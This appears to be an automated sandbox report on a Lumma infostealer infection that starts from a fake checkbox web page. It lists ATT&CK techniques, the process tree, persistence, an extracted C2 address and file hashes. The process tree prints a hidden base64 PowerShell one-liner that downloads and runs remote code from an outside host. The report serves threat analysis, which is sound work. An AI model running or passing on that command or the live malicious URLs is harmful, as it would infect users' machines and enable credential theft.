lumma | hxxps://sos-at-vie-1[.]exo[.]io/bucketrack/dir62/final/ver-check-box-tick[.]html

Analysis

max time kernel
120s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://sos-at-vie-1.exo.io/bucketrack/dir62/final/ver-check-box-tick.html

Score

10^/10

lumma discovery execution persistence stealer

Malware Config

Extracted

Family

lumma

https://5ptit5tuded.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Blocklisted process makes network request 4 IoCs

Processes:

PowerShell.exemsiexec.exe

flow pid process

44 4216 PowerShell.exe
68 3080 msiexec.exe
71 3080 msiexec.exe
75 3080 msiexec.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

PowerShell.exe

pid process

4216 PowerShell.exe
Executes dropped EXE 1 IoCs

Processes:

Setup.exe

pid process

4200 Setup.exe
Loads dropped DLL 9 IoCs

Processes:

Setup.exe

pid process

4200 Setup.exe
4200 Setup.exe
4200 Setup.exe
4200 Setup.exe
4200 Setup.exe
4200 Setup.exe
4200 Setup.exe
4200 Setup.exe
4200 Setup.exe

flow	pid	process
44	4216	PowerShell.exe
68	3080	msiexec.exe
71	3080	msiexec.exe
75	3080	msiexec.exe

pid	process
4216	PowerShell.exe

pid	process
4200	Setup.exe

pid	process
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

PowerShell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp = "C:\\Users\\Admin\\AppData\\Roaming\\zcZPHzDH\\Setup.exe"	PowerShell.exe

Drops file in System32 directory 1 IoCs

Processes:

PowerShell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Setup.exe

description pid process target process

PID 4200 set thread context of 6088 4200 Setup.exe more.com
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

description	pid	process	target process
PID 4200 set thread context of 6088	4200	Setup.exe	more.com

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

more.commsiexec.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exePowerShell.exeSetup.exemore.com

pid	process
1952	msedge.exe
1952	msedge.exe
3636	msedge.exe
3636	msedge.exe
3100	identity_helper.exe
3100	identity_helper.exe
4216	PowerShell.exe
4216	PowerShell.exe
4216	PowerShell.exe
4200	Setup.exe
4200	Setup.exe
4200	Setup.exe
6088	more.com
6088	more.com
6088	more.com
6088	more.com

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Setup.exemore.com

pid process

4200 Setup.exe
6088 more.com
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

3636 msedge.exe
3636 msedge.exe
3636 msedge.exe
3636 msedge.exe
3636 msedge.exe
3636 msedge.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

PowerShell.exe

description pid process

Token: SeDebugPrivilege 4216 PowerShell.exe

pid	process
4200	Setup.exe
6088	more.com

description	pid	process
Token: SeDebugPrivilege	4216	PowerShell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3636 wrote to memory of 3820	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 3820	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 4480	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 1952	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 1952	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe
PID 3636 wrote to memory of 928	3636	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://sos-at-vie-1.exo.io/bucketrack/dir62/final/ver-check-box-tick.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff952c546f8,0x7ff952c54708,0x7ff952c54718
  2⤵
  PID:3820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2364 /prefetch:2
  2⤵
  PID:4480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:2260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:2780
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
  2⤵
  PID:3480
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:5404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:5412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,17325265467410936201,12250070560928136888,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
  2⤵
  PID:5576

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3224

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:216

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w HIDdEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZGlydmVyaWYub3NzLWFwLXNvdXRoZWFzdC01LmFsaXl1bmNzLmNvbS9jaGVja3BvaW50L3hhU1BKTmJsLnR4dCcgLVVzZUJhc2ljUGFyc2luZykuQ29udGVudA==')) | iex"
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216
- C:\Users\Admin\AppData\Roaming\zcZPHzDH\Setup.exe
  "C:\Users\Admin\AppData\Roaming\zcZPHzDH\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4200
- - C:\Windows\SysWOW64\more.com
    C:\Windows\SysWOW64\more.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:6088
  - - C:\Windows\SysWOW64\msiexec.exe
      C:\Windows\SysWOW64\msiexec.exe
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      PID:3080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b8880802fc2bb880a7a869faa01315b0

SHA1
51d1a3fa2c272f094515675d82150bfce08ee8d3

SHA256
467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

SHA512
e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ba6ef346187b40694d493da98d5da979

SHA1
643c15bec043f8673943885199bb06cd1652ee37

SHA256
d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

SHA512
2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
459B

MD5
f6a64f28c6cf4033dd40754040e55475

SHA1
788ae528a5c5c7f72c3c8738c83223dbea72aec3

SHA256
498288a95cbe35f5423cf5999571409abfa1b723fbead96eb211fd310d0e7382

SHA512
38bea833730a5407a757e06eefb28f88edf49d79c7dd32944b084e43dc5bce17d2886a75ea802c784e2dcc776dc69d6cfb11d5c43ecc93e98c45b233f00eeb32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2009ec3e924eb83cbfad03e602cbf50c

SHA1
73b31e80a34ed235c5338ded6ab0e0f40c12d19b

SHA256
c77c2f966140c8d530357520b02dd6419acec2c83e9c7f518318e932b0d49706

SHA512
e5ac6668c3a62aa596b819f26b525ccb57b3a93e4db6dc1018ed671b192cb7127a9c7fb717a4fbff279f096fccd287eaa8ba0dbace1134d485e6b2de72c76de2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e4b82fdb3102c1d60adfa5a5209fa948

SHA1
44e37b3dafa373d44b26f58ffd1f45bd5ee8f8a2

SHA256
3cbf585d00b503381a362ca781576ef91b2ee1faf4ec9711787ec6fd82bec430

SHA512
3f1c8adb202110a2b3194427e193eb016d40f960599001f499a61abedcc94f0de916ca573e06249b0e2a78a71b6c0d07d2cdd400dfb0d60473b6b56c25487e1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c0f61e3df27a65f0eca408fdf17f9233

SHA1
afc931813bddd22252e1d6bfa4197f785d455703

SHA256
5b087a612508f9c87cc5e730fd499181843a8c724819553d60532457a7a54302

SHA512
290e7294c496b12c6e1ef2c4a237c5ebbdaf8760b48b9465eb8addf5367078801e038114770825b854b3b27cd54abb3ef7ff1e847cfd598cfcda6341acd42b3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
dd4a21ed0d98e769c02c9213e0bff4ee

SHA1
9a4942c9c9076c57d6b10e6c0ccfa898924f2f25

SHA256
d84f93d064c4265a4cd3c49a569e8c3494e676456907b1a82f8a80d388cc240a

SHA512
115aa069fda05e67810ae4a35b05c931d0eb6fb60c7f7aea95018275de25ff4cff0767d95d5a1282080347a2e7b3e17911d0fb8f268a748d5d2487e6d60b906a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lh0naz0d.lch.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a5f7f0ad

Filesize
1.0MB

MD5
2b57a65653a3810971baef9373604517

SHA1
40c92d1a1064b5292e80fac682ea16ea5cf05e55

SHA256
d5596b73e2400ef2402bc1577c97af6b66de6f5524b041a50271e9cafedca746

SHA512
4f6da25db6751dabc390dfd4e4163acb7a0140a6c8f54f398cabb236bfb3608fa1c84ce87ff537e4337cec35284df55902e9c69e655ff088792d122b92daf13f

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\Qt5Core.dll

Filesize
6.0MB

MD5
65ca5d5efcb36677f934b96f40fed552

SHA1
34a433c41b11d809e3b3b59c2f4030d1e3d94782

SHA256
0aed0ae4b0631eb3ea9ad348b4e2f6276312192b8391a44209113668911596e0

SHA512
f28707f05d23b866e7e71173e82a7f0c799f4c3caadef4f8b9b9d9ec78466f98f93755d987f4de6c75551c7dcb47703cdc2cc718de156fbd52107d78c7888c49

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\Qt5Network.dll

Filesize
1.3MB

MD5
c24c89879410889df656e3a961c59bcc

SHA1
25a9e4e545e86b0a5fe14ee0147746667892fabd

SHA256
739bedcfc8eb860927eb2057474be5b39518aaaa6703f9f85307a432fa1f236e

SHA512
0542c431049e4fd40619579062d206396bef2f6dadadbf9294619c918b9e6c96634dcd404b78c6045974295126ec35dd842c6ec8f42279d9598b57a751cd0034

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\Setup.exe

Filesize
5.4MB

MD5
ad2735f096925010a53450cb4178c89e

SHA1
c6d65163c6315a642664f4eaec0fae9528549bfe

SHA256
4e775b5fafb4e6d89a4694f8694d2b8b540534bd4a52ff42f70095f1c929160e

SHA512
1868b22a7c5cba89545b06f010c09c5418b3d86039099d681eee9567c47208fdba3b89c6251cf03c964c58c805280d45ba9c3533125f6bd3e0bc067477e03ab9

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\gcrv

Filesize
23KB

MD5
d3dbc9e34960169c38554935fee7e2a5

SHA1
b0ee82e4293ed4237a0d9ecd90eb91b99694f6b6

SHA256
86c72c5ee6de1dfcc3ed7e52a39dd2692b00c4ebf966b30a94f12c18bede0377

SHA512
7509d56a0a4f33ce39724c38ab926c113c01d6bcf314f3f4e62513ac43ac1274a34b62ab6063b0f0c0db8afd2d1ba6578f6f873bac4a9e9d0644a890b0ec49ec

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\libcrypto-1_1-x64.dll

Filesize
2.7MB

MD5
28dea3e780552eb5c53b3b9b1f556628

SHA1
55dccd5b30ce0363e8ebdfeb1cca38d1289748b8

SHA256
52415829d85c06df8724a3d3d00c98f12beabf5d6f3cbad919ec8000841a86e8

SHA512
19dfe5f71901e43ea34d257f693ae1a36433dbdbcd7c9440d9b0f9eea24de65c4a8fe332f7b88144e1a719a6ba791c2048b4dd3e5b1ed0fdd4c813603ad35112

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\libssl-1_1-x64.dll

Filesize
669KB

MD5
4ad03043a32e9a1ef64115fc1ace5787

SHA1
352e0e3a628c8626cff7eed348221e889f6a25c4

SHA256
a0e43cbc4a2d8d39f225abd91980001b7b2b5001e8b2b8292537ae39b17b85d1

SHA512
edfae3660a5f19a9deda0375efba7261d211a74f1d8b6bf1a8440fed4619c4b747aca8301d221fd91230e7af1dab73123707cc6eda90e53eb8b6b80872689ba6

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\msvcp140.dll

Filesize
564KB

MD5
1ba6d1cf0508775096f9e121a24e5863

SHA1
df552810d779476610da3c8b956cc921ed6c91ae

SHA256
74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823

SHA512
9887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\msvcp140_1.dll

Filesize
34KB

MD5
69d96e09a54fbc5cf92a0e084ab33856

SHA1
b4629d51b5c4d8d78ccb3370b40a850f735b8949

SHA256
a3a1199de32bbbc8318ec33e2e1ce556247d012851e4b367fe853a51e74ce4ee

SHA512
2087827137c473cdbec87789361ed34fad88c9fe80ef86b54e72aea891d91af50b17b7a603f9ae2060b3089ce9966fad6d7fbe22dee980c07ed491a75503f2cf

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\sbiupg

Filesize
787KB

MD5
38be7366796e12e9ddad7b3f244b401b

SHA1
59c6000b886d831e88bfa80dac222b03fbf3f193

SHA256
cbad28d0a414b7c247cbf2891bf5fc3ca7939ddc74a4ae0e4c623ad3604c8a8d

SHA512
810056eb3fc5f2021561a0b79543e893595e89444b8ec62f9aa1c67393548733645e7da93f102d2cf203abc1622cea9c879db5d06cff71a497c3339001b99f9e

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\steam_api64.dll

Filesize
291KB

MD5
6b4ab6e60364c55f18a56a39021b74a6

SHA1
39cac2889d8ca497ee0d8434fc9f6966f18fa336

SHA256
1db3fd414039d3e5815a5721925dd2e0a3a9f2549603c6cab7c49b84966a1af3

SHA512
c08de8c6e331d13dfe868ab340e41552fc49123a9f782a5a63b95795d5d979e68b5a6ab171153978679c0791dc3e3809c883471a05864041ce60b240ccdd4c21

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\vcruntime140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Roaming\zcZPHzDH\vcruntime140_1.dll

Filesize
48KB

MD5
cf0a1c4776ffe23ada5e570fc36e39fe

SHA1
2050fadecc11550ad9bde0b542bcf87e19d37f1a

SHA256
6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

